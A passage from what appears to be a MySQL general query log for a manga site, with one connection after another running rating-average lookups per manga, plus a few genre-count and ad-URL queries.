average_rating FROM ratings where manga_id = '261' order by created desc 330641282 Quit 330641283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330641283 Quit 330641284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330641284 Quit 330641285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330641285 Quit 330641286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330641286 Quit 330641287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330641287 Quit 330641288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330641288 Quit 330641289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330641289 Quit 330641290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330641290 Quit 330641291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330641291 Quit 330641292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330641292 Quit 330641293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330641293 Quit 330641294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330641294 Quit 330641295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330641295 Quit 330641296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330641296 Quit 330641297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330641297 Quit 330641298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330641298 Quit 330641299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330641299 Quit 330641300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330641300 Quit 330641301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330641301 Quit 330641026 Quit 330641302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330641302 Quit 330641304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330641304 Quit 330641305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330641305 Quit 330641306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330641306 Quit 330641307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330641303 Quit 330641307 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641308 Quit 330641309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330641309 Quit 330641307 Quit 330641310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330641310 Quit 330641311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330641311 Quit 330641312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330641312 Quit 330641313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330641313 Quit 330641314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330641314 Quit 330641315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330641315 Quit 330641316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330641316 Quit 330641317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330641317 Quit 330641318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330641320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641319 Quit 330641318 Quit 330641320 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641320 Quit 330641321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330641322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641321 Quit 330641323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641322 Quit 330641323 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330641323 Quit 330641324 Quit 330641325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330641327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641325 Quit 330641326 Quit 330641327 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641327 Quit 330641328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330641328 Quit 330641329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330641329 Quit 330641330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330641330 Quit 330641331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330641331 Quit 330641332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330641332 Quit 330641333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330641333 Quit 330641334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330641334 Quit 330641335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330641335 Quit 330641336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330641336 Quit 330641337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330641337 Quit 330641338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330641338 Quit 330641339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330641339 Quit 330641340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330641340 Quit 330641341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330641341 Quit 330641342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330641342 Quit 330641343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330641343 Quit 330641344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330641344 Quit 330641345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330641345 Quit 330641346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330641346 Quit 330641347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330641347 Quit 330641348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330641348 Quit 330641349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330641349 Quit 330641350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330641350 Quit 330641351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330641351 Quit 330641352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330641352 Quit 330641353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330641353 Quit 330641354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330641354 Quit 330641355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330641355 Quit 330641356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330641356 Quit 330641357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330641357 Quit 330641358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330641358 Quit 330641359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330641359 Quit 330641360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330641360 Quit 330641361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330641361 Quit 330641362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330641362 Quit 330641363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330641363 Quit 330641364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330641364 Quit 330641365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330641365 Quit 330641366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330641366 Quit 330641367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330641367 Quit 330641368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330641368 Quit 330641369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330641369 Quit 330641370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330641370 Quit 330641371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330641371 Quit 330641372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330641372 Quit 330641373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330641373 Quit 330641374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330641374 Quit 330641375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330641375 Quit 330641376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330641376 Quit 330641377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330641377 Quit 330641378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330641378 Quit 330641379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330641379 Quit 330641380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330641380 Quit 330641381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330641381 Quit 330641382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330641382 Quit 330641383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330641383 Quit 330641384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330641384 Quit 330641385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330641385 Quit 330641386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330641386 Quit 330641387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330641387 Quit 330641388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330641388 Quit 330641389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330641389 Quit 330641390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330641390 Quit 330641391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330641391 Quit 330641392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330641392 Quit 330641393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330641393 Quit 330641394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330641394 Quit 330641395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330641395 Quit 330641396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330641396 Quit 330641397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330641397 Quit 330641398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330641398 Quit 330641399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330641399 Quit 330641400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330641400 Quit 330641401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330641401 Quit 330641402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330641402 Quit 330641403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330641403 Quit 330641404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330641404 Quit 330641405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330641405 Quit 330641406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330641406 Quit 330641407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330641407 Quit 330641408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330641408 Quit 330641409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330641409 Quit 330641410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330641410 Quit 330641411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330641411 Quit 330641412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330641412 Quit 330641413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330641413 Quit 330641414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330641414 Quit 330641415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330641415 Quit 330641416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330641416 Quit 330641417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330641417 Quit 330641418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330641418 Quit 330641419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330641419 Quit 330641420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330641420 Quit 330641421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330641421 Quit 330641422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330641422 Quit 330641423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330641423 Quit 330641424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330641424 Quit 330641425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330641425 Quit 330641426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330641426 Quit 330641427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330641427 Quit 330641428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330641428 Quit 330641429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330641429 Quit 330641430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330641430 Quit 330641431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330641431 Quit 330641432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330641432 Quit 330641433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330641433 Quit 330641434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330641434 Quit 330641435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 